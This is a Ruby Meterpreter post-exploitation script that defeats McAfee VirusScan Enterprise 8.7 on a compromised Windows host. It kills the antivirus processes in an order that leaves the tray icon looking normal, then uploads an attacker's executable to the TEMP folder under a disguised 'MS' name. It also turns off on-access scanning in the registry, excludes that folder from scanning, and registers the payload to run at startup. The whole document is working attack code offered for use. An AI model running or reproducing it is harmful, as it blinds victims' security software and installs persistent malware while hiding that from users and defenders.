2011-10-23 11:56:13 +00:00
|
|
|
# Meterpreter script that kills Mcafee VirusScan Enterprise v8.7.0i+ processes in magic
|
|
|
|
# order which keeps VirusScan icon visible at system tray without disabled sign on it.
|
|
|
|
# Additionally it lets you disable On Access Scanner from registry, upload your detectable
|
|
|
|
# binary to TEMP folder, add that folder to the VirusScan exclusion list and CurrentVersion\Run
|
|
|
|
# registry key. (Requires administrator privilege. Tested on XP SP3)
|
|
|
|
#
|
|
|
|
# Credits: hdm, jduck, Jerome Athias (borrowed some of their codes)
|
|
|
|
#
|
|
|
|
# Provided by: Mert SARICA - mert.sarica [@] gmail.com - http://www.mertsarica.com
|
|
|
|
|
|
|
|
session = client
|
|
|
|
@@exec_opts = Rex::Parser::Arguments.new(
|
|
|
|
"-h" => [ false,"Help menu." ],
|
|
|
|
"-k" => [ false,"Only kills VirusScan processes"],
|
|
|
|
"-e" => [ true,"Executable to upload to target host. (modifies registry and exclusion list)" ]
|
|
|
|
)
|
|
|
|
|
|
|
|
################## function declaration Declarations ##################
|
|
|
|
def usage()
|
|
|
|
print_line "\nAuthor: Mert SARICA (mert.sarica [@] gmail.com) \t\tWeb: http://www.mertsarica.com"
|
|
|
|
print_line "----------------------------------------------------------------------------------------------"
|
|
|
|
print_line "Bypasses Mcafee VirusScan Enterprise v8.7.0i+, uploads an executable to TEMP folder adds it"
|
|
|
|
print_line "to exclusion list and set it to run at startup. (Requires administrator privilege)"
|
|
|
|
print_line "----------------------------------------------------------------------------------------------"
|
|
|
|
print_line(@@exec_opts.usage)
|
|
|
|
end
|
|
|
|
|
|
|
|
@path = ""
|
|
|
|
@location = ""
|
|
|
|
|
|
|
|
def upload(session,file,trgloc)
|
|
|
|
if not ::File.exists?(file)
|
|
|
|
raise "File to Upload does not exists!"
|
|
|
|
else
|
|
|
|
@location = session.fs.file.expand_path("%TEMP%")
|
|
|
|
begin
|
|
|
|
ext = file.scan(/\S*(.exe)/i)
|
|
|
|
if ext.join == ".exe"
|
|
|
|
fileontrgt = "#{@location}\\MS#{rand(100)}.exe"
|
|
|
|
else
|
|
|
|
fileontrgt = "#{@location}\\MS#{rand(100)}#{ext}"
|
|
|
|
end
|
|
|
|
@path = fileontrgt
|
|
|
|
print_status("Uploading #{file}....")
|
|
|
|
session.fs.file.upload_file("#{fileontrgt}","#{file}")
|
|
|
|
print_status("Uploaded as #{fileontrgt}")
|
|
|
|
rescue ::Exception => e
|
|
|
|
print_status("Error uploading file #{file}: #{e.class} #{e}")
|
|
|
|
end
|
|
|
|
end
|
|
|
|
return fileontrgt
|
|
|
|
end
|
|
|
|
|
|
|
|
#parsing of Options
|
|
|
|
file = ""
|
|
|
|
helpcall = 0
|
|
|
|
killonly = 0
|
|
|
|
@@exec_opts.parse(args) { |opt, idx, val|
|
|
|
|
case opt
|
|
|
|
when "-e"
|
|
|
|
file = val || ""
|
|
|
|
when "-h"
|
|
|
|
helpcall = 1
|
|
|
|
when "-k"
|
|
|
|
killonly = 1
|
|
|
|
end
|
|
|
|
|
|
|
|
}
|
|
|
|
|
|
|
|
if killonly == 0
|
|
|
|
if file == ""
|
|
|
|
usage
|
|
|
|
raise Rex::Script::Completed
|
|
|
|
end
|
|
|
|
end
|
|
|
|
|
|
|
|
# Magic kill order :)
|
|
|
|
avs = %W{
|
|
|
|
shstat.exe
|
|
|
|
engineserver.exe
|
|
|
|
frameworkservice.exe
|
|
|
|
naprdmgr.exe
|
|
|
|
mctray.exe
|
|
|
|
mfeann.exe
|
|
|
|
vstskmgr.exe
|
|
|
|
mcshield.exe
|
|
|
|
}
|
|
|
|
|
|
|
|
av = 0
|
|
|
|
|
|
|
|
plist = client.sys.process.get_processes()
|
|
|
|
plist.each do |x|
|
|
|
|
if (avs.index(x['name'].downcase))
|
|
|
|
av = av + 1
|
|
|
|
end
|
|
|
|
end
|
|
|
|
|
|
|
|
|
|
|
|
if av > 6
|
|
|
|
print_status("VirusScan Enterprise v8.7.0i+ is running...")
|
|
|
|
else
|
|
|
|
print_status("VirusScan Enterprise v8.7.0i+ is not running!")
|
|
|
|
raise Rex::Script::Completed
|
|
|
|
end
|
|
|
|
|
|
|
|
target_pid = nil
|
|
|
|
target ||= "mfevtps.exe"
|
|
|
|
|
|
|
|
print_status("Migrating to #{target}...")
|
|
|
|
|
|
|
|
# Get the target process pid
|
|
|
|
target_pid = client.sys.process[target]
|
|
|
|
|
|
|
|
if not target_pid
|
|
|
|
print_error("Could not access the target process")
|
|
|
|
raise Rex::Script::Completed
|
|
|
|
end
|
|
|
|
|
|
|
|
print_status("Migrating into process ID #{target_pid}")
|
|
|
|
client.core.migrate(target_pid)
|
|
|
|
|
|
|
|
target_pid = nil
|
|
|
|
|
|
|
|
if killonly == 1
|
|
|
|
avs.each do |x|
|
|
|
|
# Get the target process pid
|
|
|
|
target_pid = client.sys.process[x]
|
|
|
|
print_status("Killing off #{x}...")
|
|
|
|
client.sys.process.kill(target_pid)
|
|
|
|
end
|
|
|
|
else
|
|
|
|
avs.each do |x|
|
|
|
|
# Get the target process pid
|
|
|
|
target_pid = client.sys.process[x]
|
|
|
|
print_status("Killing off #{x}...")
|
|
|
|
client.sys.process.kill(target_pid)
|
|
|
|
end
|
|
|
|
|
|
|
|
# Upload it
|
|
|
|
exec = upload(session,file,"")
|
|
|
|
|
|
|
|
# Initiailze vars
|
|
|
|
key = nil
|
|
|
|
value = nil
|
|
|
|
data = nil
|
|
|
|
type = nil
|
|
|
|
|
|
|
|
# Mcafee registry key
|
|
|
|
key = 'HKLM\Software\Mcafee\VSCore\On Access Scanner\MCShield\Configuration\Default'
|
|
|
|
|
|
|
|
# Split the key into its parts
|
|
|
|
root_key, base_key = client.sys.registry.splitkey(key)
|
|
|
|
|
|
|
|
# Disable when writing to disk option
|
|
|
|
value = "bScanIncoming"
|
|
|
|
data = 0
|
|
|
|
type = "REG_DWORD"
|
|
|
|
open_key = client.sys.registry.open_key(root_key, base_key, KEY_WRITE)
|
|
|
|
open_key.set_value(value, client.sys.registry.type2str(type), data)
|
|
|
|
print_status("Successful set #{key} -> #{value} to #{data}.")
|
|
|
|
|
|
|
|
# Disable when reading from disk option
|
|
|
|
value = "bScanOutgoing"
|
|
|
|
data = 0
|
|
|
|
type = "REG_DWORD"
|
|
|
|
open_key = client.sys.registry.open_key(root_key, base_key, KEY_WRITE)
|
|
|
|
open_key.set_value(value, client.sys.registry.type2str(type), data)
|
|
|
|
print_status("Successful set #{key} -> #{value} to #{data}.")
|
|
|
|
|
|
|
|
# Disable detection of unwanted programs
|
|
|
|
value = "ApplyNVP"
|
|
|
|
data = 0
|
|
|
|
type = "REG_DWORD"
|
|
|
|
open_key = client.sys.registry.open_key(root_key, base_key, KEY_WRITE)
|
|
|
|
open_key.set_value(value, client.sys.registry.type2str(type), data)
|
|
|
|
print_status("Successful set #{key} -> #{value} to #{data}.")
|
|
|
|
|
|
|
|
# Increase the number of excluded items
|
|
|
|
value = "NumExcludeItems"
|
|
|
|
data = 1
|
|
|
|
type = "REG_DWORD"
|
|
|
|
open_key = client.sys.registry.open_key(root_key, base_key, KEY_WRITE)
|
|
|
|
open_key.set_value(value, client.sys.registry.type2str(type), data)
|
|
|
|
print_status("Successful set #{key} -> #{value} to #{data}.")
|
|
|
|
|
|
|
|
# Add executable to excluded item folder
|
|
|
|
value = "ExcludedItem_0"
|
|
|
|
data = "3|3|" + @location
|
|
|
|
type = "REG_SZ"
|
|
|
|
open_key = client.sys.registry.open_key(root_key, base_key, KEY_WRITE)
|
|
|
|
open_key.set_value(value, client.sys.registry.type2str(type), data)
|
|
|
|
print_status("Successful set #{key} -> #{value} to #{data}.")
|
|
|
|
|
|
|
|
# Set registry to run executable at startup
|
|
|
|
key = 'HKLM\Software\Microsoft\Windows\CurrentVersion\Run'
|
|
|
|
# Split the key into its parts
|
|
|
|
root_key, base_key = client.sys.registry.splitkey(key)
|
|
|
|
value = "MS"
|
|
|
|
data = @path
|
|
|
|
open_key = client.sys.registry.open_key(root_key, base_key, KEY_WRITE)
|
|
|
|
open_key.set_value(value, client.sys.registry.type2str(type), data)
|
|
|
|
print_status("Successful set #{key} -> #{value} to #{data}.")
|
|
|
|
end
|
|
|
|
|
|
|
|
print_status("Finished!")
|